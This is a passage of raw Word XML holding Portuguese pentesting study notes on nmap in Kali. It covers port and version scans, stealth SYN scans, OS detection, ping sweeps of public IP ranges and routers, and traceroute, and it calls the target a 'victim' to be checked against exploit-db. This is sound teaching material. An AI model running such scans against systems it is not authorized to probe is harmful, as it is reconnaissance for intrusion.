        <w:t>Ferramenta no Kali: NMAP</w:t>
      </w:r>
      <w:bookmarkEnd w:id="16"/>
    </w:p>
    <w:p w14:paraId="51860ADD" w14:textId="64774997" w:rsidR="00D26A8F" w:rsidRPr="00711C8C" w:rsidRDefault="00D26A8F" w:rsidP="00D26A8F">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4F4F22AF" w14:textId="14BC9C23" w:rsidR="00D26A8F" w:rsidRPr="00711C8C" w:rsidRDefault="0015143E" w:rsidP="00D26A8F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Para melhores resultados com o NMAP, você deve descobrir o IP real da sua vítima/aplicação web.</w:t>
      </w:r>
      <w:r w:rsidR="006B1CE2" w:rsidRPr="00711C8C">
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48BD2813" w14:textId="4003294E" w:rsidR="007D0232" w:rsidRPr="00711C8C" w:rsidRDefault="007D0232" w:rsidP="00D26A8F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</w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00711C8C">
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">-p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portas </w:t>
      </w:r>
      <w:r w:rsidRPr="00711C8C">
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve">-sV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Identifica versão dos serviços</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10626CD3" w14:textId="77777777" w:rsidR="007D0232" w:rsidRPr="00711C8C" w:rsidRDefault="007D0232" w:rsidP="00D26A8F">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0641E8D4" w14:textId="21E1A682" w:rsidR="007D0232" w:rsidRPr="00711C8C" w:rsidRDefault="007D0232" w:rsidP="007B7CF2">
      <w:pPr>
        <w:jc w:val="center"/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Sintaxe: </w:t>
      </w:r>
      <w:r w:rsidRPr="00711C8C">
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">nmap IP -p </w:t>
      </w:r>
      <w:r w:rsidRPr="00711C8C">
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve">80, 21, 22, 25, 8080, 3306 </w:t>
      </w:r>
      <w:r w:rsidRPr="00711C8C">
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>-sV</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F9E06C3" w14:textId="5454776B" w:rsidR="00E962E5" w:rsidRPr="00711C8C" w:rsidRDefault="00E962E5" w:rsidP="003053B9">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="477614CB" w14:textId="478C9942" w:rsidR="007603CB" w:rsidRPr="00711C8C" w:rsidRDefault="007603CB" w:rsidP="003053B9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Pode receber como resposta as versões dos serviços, na qual, futuramente você pode usar pesquisar por algum </w:t>
      </w:r>
      <w:r w:rsidRPr="00711C8C">
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>exploit-db</w:t>
      </w:r>
      <w:r w:rsidRPr="00711C8C">
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> e verificar se há alguma vulnerabilidade.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="510F613C" w14:textId="77777777" w:rsidR="00322879" w:rsidRPr="00711C8C" w:rsidRDefault="00322879" w:rsidP="003053B9">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0D303417" w14:textId="587B2F32" w:rsidR="00322879" w:rsidRPr="00711C8C" w:rsidRDefault="00322879" w:rsidP="003053B9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Uma técnica: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7316C995" w14:textId="45118A70" w:rsidR="00322879" w:rsidRPr="00711C8C" w:rsidRDefault="00322879" w:rsidP="003053B9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ab/>
        <w:t>Verificar primeiro quais hosts estão ativos em cada um dos IPs descobertos e depois fazer um nmap detalhado em cada um deles.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77E04387" w14:textId="77777777" w:rsidR="00C63893" w:rsidRPr="00711C8C" w:rsidRDefault="00C63893" w:rsidP="003053B9">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="765B15BA" w14:textId="26B42D3C" w:rsidR="007603CB" w:rsidRPr="00711C8C" w:rsidRDefault="00D7571D" w:rsidP="003053B9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 xml:space="preserve">0-100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</w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00711C8C">
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>O último número do IP, altera range inicial até final.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0571B68A" w14:textId="7631F778" w:rsidR="00E53ABD" w:rsidRPr="00711C8C" w:rsidRDefault="00E53ABD" w:rsidP="003053B9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 xml:space="preserve">Máscara de rede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Ex.: 104.16.0.0/12 -sn</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6938156F" w14:textId="77777777" w:rsidR="00C63893" w:rsidRPr="00711C8C" w:rsidRDefault="00C63893" w:rsidP="003053B9">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6C1F58B7" w14:textId="11121BB3" w:rsidR="00D7571D" w:rsidRPr="00711C8C" w:rsidRDefault="00D7571D" w:rsidP="003053B9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 xml:space="preserve">-sn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Verifica </w:t>
      </w:r>
      <w:r w:rsidR="0054342D" w:rsidRPr="00711C8C">
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">se o host está </w:t>
      </w:r>
      <w:r w:rsidRPr="00711C8C">
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>ativo</w:t>
      </w:r>
      <w:r w:rsidR="0054342D" w:rsidRPr="00711C8C">
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> ou não</w:t>
      </w:r>
      <w:r w:rsidRPr="00711C8C">
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> no range.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4148F38D" w14:textId="2FF36F13" w:rsidR="00C63893" w:rsidRPr="00711C8C" w:rsidRDefault="00F92C3E" w:rsidP="00F92C3E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 xml:space="preserve">-O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Verifica qual é o sistema operacional.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FA86DC6" w14:textId="2EE026FD" w:rsidR="00FD0064" w:rsidRPr="00711C8C" w:rsidRDefault="00FD0064" w:rsidP="00F92C3E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 xml:space="preserve">-sS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Scan furtivo</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75188C56" w14:textId="5BBAF822" w:rsidR="00DD16A3" w:rsidRPr="00711C8C" w:rsidRDefault="00DD16A3" w:rsidP="003053B9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 xml:space="preserve">-T5 </w:t>
      </w:r>
      <w:r w:rsidRPr="00711C8C">
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"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Velocidade do </w:t>
      </w:r>
      <w:r w:rsidR="00F65F64" w:rsidRPr="00711C8C">
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>S</w:t>
      </w:r>
      <w:r w:rsidRPr="00711C8C">
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>can sendo 0 (mais lento, mais preciso) e 5 (mais rápido, menos preciso).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7030647A" w14:textId="2ECE16B4" w:rsidR="00D7571D" w:rsidRPr="00711C8C" w:rsidRDefault="00D7571D" w:rsidP="003053B9">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1A9B05BF" w14:textId="77777777" w:rsidR="00C63893" w:rsidRPr="00711C8C" w:rsidRDefault="00C63893" w:rsidP="003053B9">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="14DB6D7B" w14:textId="77777777" w:rsidR="00C63893" w:rsidRPr="00711C8C" w:rsidRDefault="00D7571D" w:rsidP="007B7CF2">
      <w:pPr>
        <w:jc w:val="center"/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</w:rPr>
        <w:t xml:space="preserve">Sintaxe: </w:t>
      </w:r>
      <w:r w:rsidRPr="00711C8C">
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">nmap </w:t>
      </w:r>
      <w:r w:rsidRPr="00711C8C">
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta" w:cs="Arial"/>
        </w:rPr>
        <w:t>104.21.52.0-100</w:t>
      </w:r>
      <w:r w:rsidRPr="00711C8C">
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> -sn </w:t>
      </w:r>
      <w:r w:rsidR="00DD16A3" w:rsidRPr="00711C8C">
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>-T5</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49690BF6" w14:textId="77777777" w:rsidR="00C63893" w:rsidRPr="00711C8C" w:rsidRDefault="00C63893" w:rsidP="003053B9">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="60336855" w14:textId="279B3DD5" w:rsidR="007603CB" w:rsidRPr="00711C8C" w:rsidRDefault="00D7571D" w:rsidP="003053B9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>(OBS:</w:t>
      </w:r>
      <w:r w:rsidRPr="00711C8C">
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> Utilizar </w:t>
      </w:r>
      <w:r w:rsidRPr="00711C8C">
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">-sn </w:t>
      </w:r>
      <w:r w:rsidRPr="00711C8C">
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta" w:cs="Arial"/>
        </w:rPr>
        <w:t>primeiro, para identificar serviços ativos e depois fazer um Port Scanning mais detalhado</w:t>
      </w:r>
      <w:r w:rsidRPr="00711C8C">
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43145691" w14:textId="7E49DFD9" w:rsidR="00F0252A" w:rsidRPr="00711C8C" w:rsidRDefault="00F0252A" w:rsidP="003053B9">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6D7FC79A" w14:textId="615DA344" w:rsidR="00EA510B" w:rsidRPr="00711C8C" w:rsidRDefault="00F0252A" w:rsidP="003053B9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Se você estiver na máquina virtual e está conectado a uma rede, você pode mudar nas configurações</w:t>
      </w:r>
      <w:r w:rsidR="00583A84" w:rsidRPr="00711C8C">
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> de rede</w:t>
      </w:r>
      <w:r w:rsidRPr="00711C8C">
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> da VM para “Placa em modo Bridge”, ao colocar o comando </w:t>
      </w:r>
      <w:r w:rsidRPr="00711C8C">
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>ipconfig</w:t>
      </w:r>
      <w:r w:rsidRPr="00711C8C">
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> você verá o IP da rede local em </w:t>
      </w:r>
      <w:r w:rsidRPr="00711C8C">
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>inet.</w:t>
      </w:r>
      <w:r w:rsidR="00EA510B" w:rsidRPr="00711C8C">
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> Isso pode te ajudar a verificar quem está conectado na rede da empresa ou sua rede local, analisar os IPs.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="355AE0F1" w14:textId="7A745F1B" w:rsidR="00EA510B" w:rsidRPr="00711C8C" w:rsidRDefault="00EA510B" w:rsidP="003053B9">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5D717BAE" w14:textId="1BC2F946" w:rsidR="00EA510B" w:rsidRPr="00711C8C" w:rsidRDefault="00EA510B" w:rsidP="007B7CF2">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00711C8C">
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta" w:cs="Arial"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Sintaxe: </w:t>
      </w:r>
      <w:r w:rsidRPr="00711C8C">
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">nmap </w:t>
      </w:r>
      <w:r w:rsidRPr="00711C8C">
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve">192.168.1.0-255 </w:t>
      </w:r>
      <w:r w:rsidRPr="00711C8C">
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>-sn</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BA403E6" w14:textId="7A8CD4BE" w:rsidR="00EA510B" w:rsidRPr="00711C8C" w:rsidRDefault="00EA510B" w:rsidP="003053B9">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4A84E5A3" w14:textId="77777777" w:rsidR="007A6269" w:rsidRPr="00711C8C" w:rsidRDefault="007A6269" w:rsidP="007A6269">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3B7F4094" w14:textId="2F90366E" w:rsidR="008720AA" w:rsidRPr="00711C8C" w:rsidRDefault="008720AA" w:rsidP="007A6269">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00711C8C">
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta" w:cs="Arial"/>
        </w:rPr>
        <w:t>Caso você identifique o IP de um modem/roteador, você pode fazer um scan também nesses serviços:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1535111F" w14:textId="4C0DD794" w:rsidR="008720AA" w:rsidRPr="00711C8C" w:rsidRDefault="008720AA" w:rsidP="008720AA">
      <w:pPr>
        <w:jc w:val="center"/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</w:rPr>
        <w:t xml:space="preserve">Sintaxe: </w:t>
      </w:r>
      <w:r w:rsidRPr="00711C8C">
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">nmap </w:t>
      </w:r>
      <w:r w:rsidRPr="00711C8C">
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta" w:cs="Arial"/>
        </w:rPr>
        <w:t>IP</w:t>
      </w:r>
      <w:r w:rsidRPr="00711C8C">
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> -sS -s</w:t>
      </w:r>
      <w:r w:rsidR="00247B2A" w:rsidRPr="00711C8C">
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>V</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19284D1E" w14:textId="3A233138" w:rsidR="00262B9B" w:rsidRPr="00711C8C" w:rsidRDefault="00262B9B" w:rsidP="008720AA">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="73240975" w14:textId="657E791F" w:rsidR="00262B9B" w:rsidRPr="00711C8C" w:rsidRDefault="007C7EB8" w:rsidP="00262B9B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</w:rPr>
        <w:t xml:space="preserve">Um jeito bacana de se trabalhar com nmap é utilizar o </w:t>
      </w:r>
      <w:r w:rsidRPr="00711C8C">
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>-A.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FF98CE7" w14:textId="07112E5C" w:rsidR="007C7EB8" w:rsidRPr="00711C8C" w:rsidRDefault="007C7EB8" w:rsidP="00262B9B">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta" w:cs="Arial"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00711C8C">
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">-A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  <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> Combina OS Detection, Versions, Script scanning e traceroute.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="392C451B" w14:textId="7263F3CC" w:rsidR="007C7EB8" w:rsidRPr="00711C8C" w:rsidRDefault="007C7EB8" w:rsidP="00262B9B">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta" w:cs="Arial"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="554BE6C4" w14:textId="5CA08BC4" w:rsidR="00B93831" w:rsidRPr="00711C8C" w:rsidRDefault="007C7EB8" w:rsidP="007C7EB8">
      <w:pPr>
        <w:jc w:val="center"/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Sintaxe: </w:t>
      </w:r>
      <w:r w:rsidRPr="00711C8C">
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">nmap -A </w:t>
      </w:r>
      <w:r w:rsidRPr="00711C8C">
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta" w:cs="Arial"/>
        </w:rPr>
        <w:t>IP</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="161ECFB9" w14:textId="3646644B" w:rsidR="00B93831" w:rsidRPr="00711C8C" w:rsidRDefault="00B93831" w:rsidP="00B93831">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="78488BE7" w14:textId="07A864E1" w:rsidR="00B93831" w:rsidRPr="00711C8C" w:rsidRDefault="00B93831" w:rsidP="00B93831">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00711C8C">
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta" w:cs="Arial"/>
        </w:rPr>
        <w:t>As vezes alguns servidores eles bloqueiam pacotes ICMP (Internet Control Message Protocol), quando você vai fazer um scan com nmap ele não consegue identificar que aquele host está ativo, porque o host não responde ping.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07F2E1F7" w14:textId="06084DAF" w:rsidR="00B93831" w:rsidRPr="00711C8C" w:rsidRDefault="00B93831" w:rsidP="00B93831">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00711C8C">
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">-Pn </w:t>
      </w:r>
      <w:r w:rsidRPr="00711C8C">
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"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Já trata os hosts como ativos/online.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61171AD6" w14:textId="4E6D7B2D" w:rsidR="00B93831" w:rsidRPr="00711C8C" w:rsidRDefault="00B93831" w:rsidP="007C7EB8">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="43D80FD1" w14:textId="4192DAF0" w:rsidR="008D673B" w:rsidRPr="00711C8C" w:rsidRDefault="00327283" w:rsidP="00B93831">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00711C8C">
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Traceroute</w:t>
      </w:r>
      <w:r w:rsidR="007A6269" w:rsidRPr="00711C8C">
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>/tracert</w:t>
      </w:r>
      <w:r w:rsidRPr="00711C8C">
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00711C8C">
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:sym w:font="Wingdings" w:char="F0E0"/>
      </w:r>
      <w:r w:rsidRPr="00711C8C">
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00711C8C">
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta" w:cs="Arial"/>
        </w:rPr>
        <w:t>É uma ferramenta de diagnóstico que rastreia a rota de um pacote através de uma rede de computadores que utiliza os protocolos IP e o ICMP.</w:t>
      </w:r>
      <w:r w:rsidR="00C44F89" w:rsidRPr="00711C8C">
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> O Traceroute é usado quando se deseja identificar a rota percorrida por um pacote de dados pela rede até a chegada em seu destino.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30A3F8C9" w14:textId="77777777" w:rsidR="001C3F3C" w:rsidRPr="00711C8C" w:rsidRDefault="001C3F3C" w:rsidP="00B93831">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="210DDDFE" w14:textId="0C0306D1" w:rsidR="001C3F3C" w:rsidRPr="00711C8C" w:rsidRDefault="001C3F3C" w:rsidP="001C3F3C">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta" w:cs="Arial"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00711C8C">
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta" w:cs="Arial"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Sintaxe Windows: </w:t>
      </w:r>
      <w:r w:rsidRPr="00711C8C">
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">tracert </w:t>
      </w:r>
      <w:r w:rsidRPr="00711C8C">
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta" w:cs="Arial"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>IP/Site</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="078C197F" w14:textId="025BE7B3" w:rsidR="00827643" w:rsidRPr="00711C8C" w:rsidRDefault="00827643" w:rsidP="00827643">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta" w:cs="Arial"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00711C8C">
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta" w:cs="Arial"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Sintaxe Linux: </w:t>
      </w:r>
      <w:r w:rsidRPr="00711C8C">
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">traceroute </w:t>
      </w:r>
      <w:r w:rsidRPr="00711C8C">
        <w:rPr>
